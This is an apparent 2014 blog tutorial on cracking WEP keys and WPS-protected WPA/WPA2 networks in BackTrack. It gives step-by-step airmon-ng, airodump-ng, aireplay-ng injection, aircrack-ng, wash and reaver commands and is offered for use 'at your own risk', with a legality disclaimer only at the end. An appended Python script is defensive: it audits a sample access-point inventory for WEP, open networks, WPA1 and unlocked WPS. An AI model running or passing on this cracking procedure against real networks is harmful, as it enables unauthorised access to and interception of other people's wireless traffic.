Sunday, May 11, 2014

How to Crack WEP/WPA/WPA2 PSK Encryption using BACKTRACK

WEP/WPA/WPA2 PSK Encryption

Try it at your own risk.

Cracking WEP Encryption


# airmon-ng start wlan0

---> Observe that monitor mode is enabled; the monitor interface may be named mon0, mon1, or mon2. Use that name in the commands below.

# airodump-ng mon0

New Terminal (do not close the previous terminals; keep them running)
# airodump-ng -c [Channel Number] --bssid [BSSID] -w wep mon0

New Terminal (the aireplay commands speed up IV collection)

# aireplay-ng -1 0 -a [BSSID] mon0
---> The result should be "Association successful".

New Terminal
# aireplay-ng -3 -b [BSSID] mon0

New Terminal

# aircrack-ng wep-01.cap

---> After enough IVs have been captured, the recovered key is displayed. (With the two aireplay steps this takes about 10 to 20 minutes; if they are skipped it can take hours, but the key is still recovered.)

Cracking WPA/WPA2 PSK Encryption


# airmon-ng start wlan0

# airodump-ng mon0

# wash -i mon0
---> Shows which access points have WPS locked and which are unlocked. Only unlocked ones can be cracked.

# reaver -i mon0 -c [Channel Number] -b [BSSID] -vv

---> It should first report "Association successful" and then start trying PINs such as 12345670; otherwise it will not be cracked.
It can take hours, depending on the strength of the password and the signal strength.

Both the WEP and WPA2 PSK cracking steps have been tested in Backtrack 5 R3. WEP was tested in Backtrack 5 R2 as well.

The WPA2 PSK cracking success rate is not good in my case, but it has certainly succeeded once.
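The weaknesses the two procedures above rely on (WEP, and WPS left enabled and unlocked) are ones a network owner can find and remove from their own access points before anyone else does. The script below is an added example, not part of the original post: it audits a constructed, comma-separated inventory of the kind an owner might assemble from airodump-ng and wash output (the column names bssid, channel, privacy, wps_locked and essid are an assumption of this example, not a tool's output format) and reports which access points still run WEP, are open, run WPA rather than WPA2, or have WPS enabled and unlocked, together with the fix for each.

```python
"""Audit a wireless AP inventory for the weaknesses a WEP/WPS attack depends on.

Added example (not the post's own code). The CSV layout is assumed for this
example; the BSSIDs and ESSIDs in SAMPLE_INVENTORY are constructed.
"""
import csv
import io
from collections import defaultdict

# Constructed sample inventory of an owner's own access points.
SAMPLE_INVENTORY = """\
bssid,channel,privacy,wps_locked,essid
00:11:22:33:44:01,6,WEP,No,office-legacy
00:11:22:33:44:02,11,WPA2,No,office-main
00:11:22:33:44:03,1,WPA2,Yes,office-guest
00:11:22:33:44:04,6,OPN,No,lobby-open
00:11:22:33:44:05,11,WPA,No,warehouse
"""

# Finding code -> (why it matters to the owner, what to change)
REMEDIATION = {
    "WEP": ("the WEP key is recoverable from captured traffic in minutes",
            "reconfigure the AP for WPA2-PSK (or WPA3) with a long random passphrase"),
    "OPEN": ("traffic is unencrypted and anyone in range can join",
             "enable WPA2-PSK or better"),
    "WPA1": ("WPA (TKIP) is deprecated",
             "switch to WPA2 with AES/CCMP, or WPA3"),
    "WPS_UNLOCKED": ("the WPS PIN can be brute-forced while WPS is enabled and unlocked",
                     "disable WPS in the AP configuration; lockout only slows the attack down"),
}


def classify(row):
    """Return the list of finding codes for one inventory row."""
    privacy = row["privacy"].strip().upper()
    locked = row["wps_locked"].strip().lower() in ("yes", "y", "true", "1")
    codes = []
    if privacy == "WEP":
        codes.append("WEP")
    elif privacy == "OPN":
        codes.append("OPEN")
    elif privacy == "WPA":
        codes.append("WPA1")
    # WPS PIN recovery is only relevant to WPA/WPA2 networks with WPS unlocked.
    if privacy.startswith("WPA") and not locked:
        codes.append("WPS_UNLOCKED")
    return codes


def audit_inventory(text):
    """Parse the CSV inventory; return {bssid: [codes]} for APs with findings only."""
    report = {}
    for row in csv.DictReader(io.StringIO(text)):
        codes = classify(row)
        if codes:
            report[row["bssid"].strip()] = codes
    return report


def summarize(report):
    """Count how many APs carry each finding code."""
    counts = defaultdict(int)
    for codes in report.values():
        for code in codes:
            counts[code] += 1
    return dict(counts)


def format_report(text):
    """Human-readable remediation list, one line per finding."""
    lines = []
    for bssid, codes in audit_inventory(text).items():
        for code in codes:
            why, fix = REMEDIATION[code]
            lines.append(f"{bssid}: {code}: {why} -> {fix}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_report(SAMPLE_INVENTORY))
    print(summarize(audit_inventory(SAMPLE_INVENTORY)))
```

Running it on the constructed sample lists four access points that need attention; the one AP with WPA2 and WPS locked produces no finding. For a real inventory, disabling WPS outright is the fix that removes the reaver step entirely, since the lockout that wash reports is a rate limit rather than a cure.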

Note:
This is illegal and should not be tried without sufficient permission. Try it at your own risk.